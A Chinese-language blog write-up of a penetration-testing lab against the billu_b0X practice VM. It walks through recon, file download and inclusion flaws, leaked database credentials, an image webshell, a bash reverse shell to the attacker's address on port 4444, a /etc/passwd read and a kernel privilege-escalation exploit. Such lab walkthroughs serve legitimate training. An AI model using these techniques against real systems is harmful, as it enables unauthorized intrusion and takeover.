靶机练习-1:billu_b0X
靶机练习-1:billu_b0X
环境准备:
Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址
kali linux 2020虚拟机,ip地址192.168.1.137
渗透步骤:
信息收集:
1.ip发现
1 |
|
使用nmap扫描本网段主机,其中192.168.1.1为网卡地址,192.168.1.3为网关,137为本机地址,
目标靶机ip为192.168.1.132
或者使用命令arp-scan -l扫描,效果相同,且不扫描本机
2.端口及服务扫描
使用nmap进行端口和服务扫描,指定1-65535全端口,并添加参数A做服务识别和深度扫描,生成结果文件a.txt
1 |
|
从上图中可以看到,靶机是一台ubuntu,开启http服务,访问上去看一下
show me your sqli skills:让展示一下注入技巧,sqlmap测试未果,再看看其他的目录
[]
3.目录及页面扫描
用kali的dirb跑一下目录
+
同时windows用御剑跑一下,可以得到更多的爆破结果
得到页面较多,test.php、add.php、in.php、c.php、index.php、show.php等,目录有:uploaded_images,phpmy,依次访问
漏洞挖掘
1.访问test.php:页面提示file参数为空,需要提供file参数
测试一下文件下载,不行,会跳转回首页
2.在Firefox的Hackbar中,将get请求,变更为post请求,文件下载
成功,获得passwd文件,这里用burp改包也行,但是要麻烦一些,就直接hackbar了。
3.通过同样文件包含的方法,下载add.php、in.php、c.php、index.php、show.php、panel.php等文件,后面可以访问文件的同时,审计文件的源代码。
访问add.php、in.php页面和审计代码
add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息
5.查看c.php源码
这是个数据库连接文件,人家直接写了mysql连接用户名密码
6.通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面
用刚刚在c.php看到的用户名:billu,密码:b0x_billu登录,登录成功
在ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it
7.回index.php,登进去
进来以后看到一个账号管理界面,里面已经有了两个账户,杰克船长和巴博萨船长
两个账号的头像图片地址,在之前已经暴破出来:uploaded_images,登上去,下载一张图片jack.jpg出来,里面有些乱七八糟的东西,是我第一遍做的时候传上去的,不管它们,不影响接着做
7.点击add user进入添加账号界面,这是一个图片上传,可以利用图片上传和文件包含获得shell。
查看之前test文件包含获得的panel.php源码,发现panel.php存在本地文件包含漏洞:
用文本编辑器打开刚刚下载下来的图片,在文件末尾加一条命令,生成图片马
把这张图片上传上去
测试一下图片马能否正常使用,点击continue,用burp抓包,使用burp执行命令:
post请求url中加入执行命令的参数:POST /panel.php?cmd=cat%20/etc/passwd;ls
post的body中包含cmd.jpg图片马:load=/uploaded_images/3.jpg&continue=continue
可以看到测试没有问题,命令成功被执行
8.制作一个反弹shell,命令:echo “bash -i >& /dev/tcp/192.168.1.137/4444 0>&1″ | bash
需要先将命令url编码:
在post的url中加入编码好的命令
在发送前,先在命令行nc监听,以便接受反弹shell
点击发送,接收成功
提权
1.提权准备工作
这里需要找一个有写权限的目录,先前我们上传图片的那个目录/uploaded_images,很显然就有写权限,不然也没法往里面上传图片,我们在这个目录下写一个菜刀马,一会方便用菜刀连接传输文件
菜刀连接一下,如图连接成功
2.提升权限
查看系统内核,命令uanme -a和cat /etc/issue
可以看到详细的系统信息
这里可以使用一个著名的ubuntu本地提权exp,https://www.exploit-db.com/exploits/37292,这个链接可以下载下来
下载后把这个文件用菜刀放到/uploaded_images目录下
然后赋予这个文件权限
编译exp
然后运行即可提权
查看是否生效,如图,提权成功
总结
在爆破完目录后注意要尽量利用test.php下载所有可下载的页面源码,以提高发现漏洞的可能;在登录phpmyadmin和拿到普通用户密码登录index.php时,要注意区分大小写;在上传图片马成功准备制作反弹shell时,尽量不要耽搁时间,页面会话时间较短,很容易会话过期,在利用图片马时,发送至repeater模块的请求是带有cookie的,若页面会话过期注意重新登录后更换请求,不然带着过期的cookie进行请求会一直接收不到反弹shell(被这个折磨了很久,一开始一直找不到原因)
作者:C0mpactDisk,本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!